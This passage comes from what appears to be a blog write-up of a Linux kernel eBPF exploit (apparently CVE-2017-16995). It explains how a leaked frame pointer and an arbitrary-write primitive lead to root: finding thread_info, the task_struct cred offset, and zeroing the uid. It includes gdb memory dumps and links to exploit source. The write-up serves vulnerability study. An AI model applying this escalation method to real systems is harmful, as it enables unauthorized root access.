(2) a = 1: (leak frame pointer) load the value of the frame pointer into the third element of the bpf_map.
(3) a = 2: (arbitrary write) write the value c to address b.

Local Privilege Escalation

Finally, we come to the point of EoP, the final part of the exploit. Here I just need to figure out what to do after leaking the frame pointer.
A pointer to the current task_struct is stored in struct thread_info, which is located at the base of the kernel stack.

struct thread_info {
	struct task_struct	*task;		/* main task structure */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	mm_segment_t		addr_limit;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */
};

After leaking the frame pointer, all we need to do is locate the base of the kernel stack.

#register status at the time of leaking frame pointer
0xffff88007742e200:	0x0000000200000002	0x0000000800000004
0xffff88007742e210:	0x0000000100000003	0xffff88007c405e00
0xffff88007742e220:	0xffffffff81a14060	0x0000000000000000
0xffff88007742e230:	0x0000000000000000	0x0000000000000000
0xffff88007742e240:	0x0000000000000000	0x0000000000000001
0xffff88007742e250:	0x0000000000000008	0x0000000000000000
0xffff88007742e260:	0x0000000000000001	0x0000000000000000
0xffff88007742e270:	0xffff88007a41bcc8	0x0000000000000000
0xffff88007742e280:	0xffff88007742e000	0xffffffff811b78a0
0xffff88007742e290:	0x0000000000000000	0xffff88007742e298

#memory layout at the base of the kernel stack (struct thread_info)
0xffff88007a418000:	0xffff88007c9edc00	0x0000000000000000
0xffff88007a418010:	0x0000000000000000	0x00007ffffffff000
0xffff88007a418020:	0x0000000000000000	0x0000000057ac6e9d
0xffff88007a418030:	0x0000000000000000	0x0000000000000000

#credential info of current task_struct
(gdb) p/x *(((struct task_struct*)(0xffff88007c9edc00))->cred)
$6 = {usage = {counter = 0xa}, uid = {val = 0x3e8}, gid = {val = 0x3e8}, suid = {val = 0x3e8}, sgid = {val = 0x3e8}, euid = {val = 0x3e8}, egid = {val = 0x3e8}, fsuid = {val = 0x3e8}, fsgid = {val = 0x3e8}, securebits = 0x0, cap_inheritable = {cap = {0x0, 0x0}}, cap_permitted = {cap = {0x0, 0x0}}, cap_effective = {cap = {0x0, 0x0}}, cap_bset = {cap = {0xffffffff, 0x3f}}, cap_ambient = {cap = {0x0, 0x0}}, jit_keyring = 0x0, session_keyring = 0xffff88007a58c300, process_keyring = 0x0, thread_keyring = 0x0, request_key_auth = 0x0, security = 0xffff88007a55e2e0, user = 0xffff88007c405e00, user_ns = 0xffffffff81e389a0, group_info = 0xffff88007a58e900, rcu = {next = 0x0, func = 0x0}}

For the purpose of EoP, all we need to do is change the uid of the current process to 0. So we just need to leak the value of task_struct->cred and then set task_struct->cred->uid to 0 via the arbitrary write primitive.

#with a little effort we can find the offset of cred in task_struct
(gdb) p/x  (unsigned long)(&(((struct task_struct*)(0xffff88007c9edc00))->cred)) - 0xffff88007c9edc00
$14 = 0x5a8

All we need to do is write to the cred structure found at this offset, and we finally achieve local privilege escalation.

Conclusion

This exploit looks like a VM escape inside the kernel, so I decided to spend a lot of time on this post to cover as many details of the exploit as possible.

Reference

[1] http://cyseclabs.com/exploits
[2] http://www.cnblogs.com/rebeyond/p/8921307.html
[3] https://security.tencent.com/index.php/blog/msg/124
[4] https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.4.33.tar.gz
[5] https://github.com/dangokyo/CVE_2017_16995/blob/master/disassembler.c
[6] https://github.com/dangokyo/CVE_2017_16995/blob/master/eop.c
